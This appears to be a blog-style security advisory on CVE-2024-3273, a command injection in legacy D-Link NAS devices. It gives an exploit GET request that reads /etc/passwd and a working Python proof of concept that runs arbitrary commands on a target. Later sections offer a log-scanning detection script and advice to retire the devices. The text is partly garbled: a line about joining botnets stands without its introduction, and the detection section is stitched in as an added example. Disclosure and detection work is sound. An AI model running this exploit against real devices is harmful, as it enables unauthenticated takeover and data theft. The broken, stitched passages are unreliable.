_Discovered: April 2024_
_Affected Models: D-Link DNS-320L, DNS-325, DNS-327L, DNS-340L (Up to 20240403)_
_Reference: VDB-259284_
_Exploit Status: Public_
What is CVE-2024-3273?
CVE-2024-3273 is a serious security vulnerability in several legacy D-Link NAS devices, including DNS-320L, DNS-325, DNS-327L, and DNS-340L. The issue lies in the HTTP endpoint /cgi-bin/nas_sharing.cgi and allows unauthenticated, remote attackers to execute arbitrary commands on the device by misusing the vulnerable system argument. This is a classic command injection attack, which can fully compromise the device.
Note:
The affected devices are no longer supported. D-Link has confirmed these products are end-of-life and will not issue a fix.
How Does the Vulnerability Work?
The vulnerable script (nas_sharing.cgi) improperly handles the system parameter in HTTP GET requests. Inputs sent to this parameter are unsafely passed to the system shell, allowing a remote attacker to inject arbitrary commands.
Example Exploit
Suppose the NAS device is exposed at http://192.168.1.100/. An attacker can send the following GET request to gain command execution:
HTTP GET Request Example
```http
GET /cgi-bin/nas_sharing.cgi?user=admin&system=cat+/etc/passwd HTTP/1.1
Host: 192.168.1.100
```
This would execute the command cat /etc/passwd (list Linux system accounts) and potentially return the output to the attacker.
Below is a simple Python proof-of-concept (PoC) to exploit the vulnerability:

```python
import requests

target_ip = "192.168.1.100"  # Change to the target's IP
cmd = "id"                   # Linux command to run

url = f"http://{target_ip}/cgi-bin/nas_sharing.cgi"
params = {
    "user": "admin",
    "system": cmd,
}

# requests URL-encodes the parameters and sends them as a GET query string
response = requests.get(url, params=params)
print(response.text)
```
Warning:
Do this only on devices you own or have explicit permission to test.
Join the NAS to botnets (crypto mining, DDoS, etc).
All this can be done without authentication if the device is exposed to the internet or a compromised WiFi/LAN environment.
Retire and Replace:
_D-Link says:_ These products are end-of-life. No security support is coming. Safest course: replace with a supported, regularly-updated NAS.
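Until the device is replaced, access logs from a reverse proxy or gateway in front of it can be searched for the request shape shown earlier. The following is an added example, not code from the original post or from D-Link: it assumes Common Log Format input, the log lines are constructed samples, and `find_hits` is a hypothetical helper name.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

ENDPOINT = "/cgi-bin/nas_sharing.cgi"  # path named in the advisory
PARAM = "system"                       # parameter named in the advisory

# Constructed sample lines in Common Log Format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [05/Apr/2024:10:01:02 +0000] "GET /cgi-bin/nas_sharing.cgi?user=admin&system=cat+/etc/passwd HTTP/1.1" 200 512
192.168.1.20 - - [05/Apr/2024:10:02:10 +0000] "GET /cgi-bin/nas_sharing.cgi?user=admin HTTP/1.1" 200 88
198.51.100.9 - - [05/Apr/2024:10:03:44 +0000] "GET /CGI-BIN/NAS_SHARING.CGI?user=admin&system=id HTTP/1.1" 404 0
192.168.1.20 - - [05/Apr/2024:10:05:00 +0000] "GET /index.html?system=1 HTTP/1.1" 200 1024
garbage line without a request
"""

# client, timestamp, request line, status
LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_hits(log_text):
    """Return one dict per request that reaches ENDPOINT with a non-empty PARAM."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a request line we can parse
        target = urlsplit(m["target"])
        # Normalise the path so encoded or mixed-case spellings still match.
        if unquote(target.path).lower() != ENDPOINT:
            continue
        query = {k.lower(): v for k, v in parse_qs(target.query).items()}
        values = query.get(PARAM)
        if not values:
            continue  # endpoint reached, but no command parameter supplied
        hits.append({
            "client": m["client"],
            "time": m["ts"],
            "status": int(m["status"]),
            "command": values[0],  # parse_qs already decoded + and %xx
        })
    return hits

if __name__ == "__main__":
    for hit in find_hits(SAMPLE_LOG):
        print(hit)
```

Any hit with a 200 status means a command parameter reached the CGI script and the device should be treated as compromised; other statuses indicate probing.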
Additional References
- Original VulDB Entry: VDB-259284
- NVD Entry: CVE-2024-3273
- D-Link End-of-Life Policy
Conclusion
CVE-2024-3273 is a critical, remotely exploitable flaw in several older D-Link NAS units. If you have a DNS-320L, DNS-325, DNS-327L, or DNS-340L, you must retire it now. No patch will be released. Leaving it online puts your files and home/SMB network at severe risk.
Stay safe: Always keep network devices up-to-date and never expose unsupported hardware to the Internet!
If you found this post helpful, consider sharing it to help others avoid the risks of legacy, unsupported devices.
Timeline
Published on: 04/04/2024 01:15:50 UTC
Last modified on: 04/15/2024 20:13:57 UTC